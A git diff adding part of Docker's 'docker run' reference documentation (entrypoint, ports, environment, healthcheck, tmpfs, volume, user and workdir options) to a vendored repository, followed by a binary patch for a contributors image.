Here is an +example of how to run a shell in a container that has been set up to +automatically run something else (like `/usr/bin/redis-server`): + + $ docker run -it --entrypoint /bin/bash example/redis + +or two examples of how to pass more parameters to that ENTRYPOINT: + + $ docker run -it --entrypoint /bin/bash example/redis -c ls -l + $ docker run -it --entrypoint /usr/bin/redis-cli example/redis --help + +You can reset a containers entrypoint by passing an empty string, for example: + + $ docker run -it --entrypoint="" mysql bash + +> **Note**: Passing `--entrypoint` will clear out any default command set on the +> image (i.e. any `CMD` instruction in the Dockerfile used to build it). + +### EXPOSE (incoming ports) + +The following `run` command options work with container networking: + + --expose=[]: Expose a port or a range of ports inside the container. + These are additional to those exposed by the `EXPOSE` instruction + -P : Publish all exposed ports to the host interfaces + -p=[] : Publish a container᾿s port or a range of ports to the host + format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort + Both hostPort and containerPort can be specified as a + range of ports. When specifying ranges for both, the + number of container ports in the range must match the + number of host ports in the range, for example: + -p 1234-1236:1234-1236/tcp + + When specifying a range for hostPort only, the + containerPort must not be a range. In this case the + container port is published somewhere within the + specified hostPort range. (e.g., `-p 1234-1236:1234/tcp`) + + (use 'docker port' to see the actual mapping) + + --link="" : Add link to another container (:alias or ) + +With the exception of the `EXPOSE` directive, an image developer hasn't +got much control over networking. The `EXPOSE` instruction defines the +initial incoming ports that provide services. These ports are available +to processes inside the container. 
An operator can use the `--expose` +option to add to the exposed ports. + +To expose a container's internal port, an operator can start the +container with the `-P` or `-p` flag. The exposed port is accessible on +the host and the ports are available to any client that can reach the +host. + +The `-P` option publishes all the ports to the host interfaces. Docker +binds each exposed port to a random port on the host. The range of +ports are within an *ephemeral port range* defined by +`/proc/sys/net/ipv4/ip_local_port_range`. Use the `-p` flag to +explicitly map a single port or range of ports. + +The port number inside the container (where the service listens) does +not need to match the port number exposed on the outside of the +container (where clients connect). For example, inside the container an +HTTP service is listening on port 80 (and so the image developer +specifies `EXPOSE 80` in the Dockerfile). At runtime, the port might be +bound to 42800 on the host. To find the mapping between the host ports +and the exposed ports, use `docker port`. + +If the operator uses `--link` when starting a new client container in the +default bridge network, then the client container can access the exposed +port via a private networking interface. +If `--link` is used when starting a container in a user-defined network as +described in [*Docker network overview*](https://docs.docker.com/engine/userguide/networking/), +it will provide a named alias for the container being linked to. 
+ +### ENV (environment variables) + +When a new container is created, Docker will set the following environment +variables automatically: + +| Variable | Value | +| -------- | ----- | +| `HOME` | Set based on the value of `USER` | +| `HOSTNAME` | The hostname associated with the container | +| `PATH` | Includes popular directories, such as `:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin` | +| `TERM` | `xterm` if the container is allocated a pseudo-TTY | + +Additionally, the operator can **set any environment variable** in the +container by using one or more `-e` flags, even overriding those mentioned +above, or already defined by the developer with a Dockerfile `ENV`: + + $ docker run -e "deep=purple" --rm ubuntu /bin/bash -c export + declare -x HOME="/" + declare -x HOSTNAME="85bc26a0e200" + declare -x OLDPWD + declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + declare -x PWD="/" + declare -x SHLVL="1" + declare -x deep="purple" + +Similarly the operator can set the **hostname** with `-h`. 
+ +### HEALTHCHECK + +``` + --health-cmd Command to run to check health + --health-interval Time between running the check + --health-retries Consecutive failures needed to report unhealthy + --health-timeout Maximum time to allow one check to run + --no-healthcheck Disable any container-specified HEALTHCHECK +``` + +Example: + + {% raw %} + $ docker run --name=test -d \ + --health-cmd='stat /etc/passwd || exit 1' \ + --health-interval=2s \ + busybox sleep 1d + $ sleep 2; docker inspect --format='{{.State.Health.Status}}' test + healthy + $ docker exec test rm /etc/passwd + $ sleep 2; docker inspect --format='{{json .State.Health}}' test + { + "Status": "unhealthy", + "FailingStreak": 3, + "Log": [ + { + "Start": "2016-05-25T17:22:04.635478668Z", + "End": "2016-05-25T17:22:04.7272552Z", + "ExitCode": 0, + "Output": " File: /etc/passwd\n Size: 334 \tBlocks: 8 IO Block: 4096 regular file\nDevice: 32h/50d\tInode: 12 Links: 1\nAccess: (0664/-rw-rw-r--) Uid: ( 0/ root) Gid: ( 0/ root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..." + }, + { + "Start": "2016-05-25T17:22:06.732900633Z", + "End": "2016-05-25T17:22:06.822168935Z", + "ExitCode": 0, + "Output": " File: /etc/passwd\n Size: 334 \tBlocks: 8 IO Block: 4096 regular file\nDevice: 32h/50d\tInode: 12 Links: 1\nAccess: (0664/-rw-rw-r--) Uid: ( 0/ root) Gid: ( 0/ root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..." 
+ }, + { + "Start": "2016-05-25T17:22:08.823956535Z", + "End": "2016-05-25T17:22:08.897359124Z", + "ExitCode": 1, + "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" + }, + { + "Start": "2016-05-25T17:22:10.898802931Z", + "End": "2016-05-25T17:22:10.969631866Z", + "ExitCode": 1, + "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" + }, + { + "Start": "2016-05-25T17:22:12.971033523Z", + "End": "2016-05-25T17:22:13.082015516Z", + "ExitCode": 1, + "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" + } + ] + } + {% endraw %} + +The health status is also displayed in the `docker ps` output. + +### TMPFS (mount tmpfs filesystems) + +```bash +--tmpfs=[]: Create a tmpfs mount with: container-dir[:], + where the options are identical to the Linux + 'mount -t tmpfs -o' command. +``` + +The example below mounts an empty tmpfs into the container with the `rw`, +`noexec`, `nosuid`, and `size=65536k` options. + + $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image + +### VOLUME (shared filesystems) + + -v, --volume=[host-src:]container-dest[:]: Bind mount a volume. + The comma-delimited `options` are [rw|ro], [z|Z], + [[r]shared|[r]slave|[r]private], and [nocopy]. + The 'host-src' is an absolute path or a name value. + + If neither 'rw' or 'ro' is specified then the volume is mounted in + read-write mode. + + The `nocopy` modes is used to disable automatic copying requested volume + path in the container to the volume storage location. + For named volumes, `copy` is the default mode. Copy modes are not supported + for bind-mounted volumes. + + --volumes-from="": Mount all volumes from the given container(s) + +> **Note**: +> When using systemd to manage the Docker daemon's start and stop, in the systemd +> unit file there is an option to control mount propagation for the Docker daemon +> itself, called `MountFlags`. 
The value of this setting may cause Docker to not
+> see mount propagation changes made on the mount point. For example, if this value
+> is `slave`, you may not be able to use the `shared` or `rshared` propagation on
+> a volume.
+
+The volumes commands are complex enough to have their own documentation
+in section [*Manage data in
+containers*](https://docs.docker.com/engine/tutorials/dockervolumes/). A developer can define
+one or more `VOLUME`'s associated with an image, but only the operator
+can give access from one container to another (or from a container to a
+volume mounted on the host).
+
+The `container-dest` must always be an absolute path such as `/src/docs`.
+The `host-src` can either be an absolute path or a `name` value. If you
+supply an absolute path for the `host-src`, Docker bind-mounts to the path
+you specify. If you supply a `name`, Docker creates a named volume by that `name`.
+
+A `name` value must start with an alphanumeric character,
+followed by `a-z0-9`, `_` (underscore), `.` (period) or `-` (hyphen).
+An absolute path starts with a `/` (forward slash).
+
+For example, you can specify either `/foo` or `foo` for a `host-src` value.
+If you supply the `/foo` value, Docker creates a bind-mount. If you supply
+the `foo` specification, Docker creates a named volume.
+
+### USER
+
+`root` (id = 0) is the default user within a container. The image developer can
+create additional users. Those users are accessible by name. When passing a numeric
+ID, the user does not have to exist in the container.
+
+The developer can set a default user to run the first process with the
+Dockerfile `USER` instruction. When starting a container, the operator can override
+the `USER` instruction by passing the `-u` option.
+
+    -u="", --user="": Sets the username or UID used and optionally the groupname or GID for the specified command. 
+
+    The following examples are all valid:
+    --user=[ user | user:group | uid | uid:gid | user:gid | uid:group ]
+
+> **Note:** if you pass a numeric uid, it must be in the range of 0-2147483647.
+
+### WORKDIR
+
+The default working directory for running binaries within a container is the
+root directory (`/`), but the developer can set a different default with the
+Dockerfile `WORKDIR` command. The operator can override this with:
+
+    -w="": Working directory inside the container
diff --git a/vendor/github.com/docker/docker/docs/static_files/contributors.png b/vendor/github.com/docker/docker/docs/static_files/contributors.png
new file mode 100644
index 0000000000000000000000000000000000000000..63c0a0c09b58bce2e1ade867760a937612934202
GIT binary patch
literal 23100
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 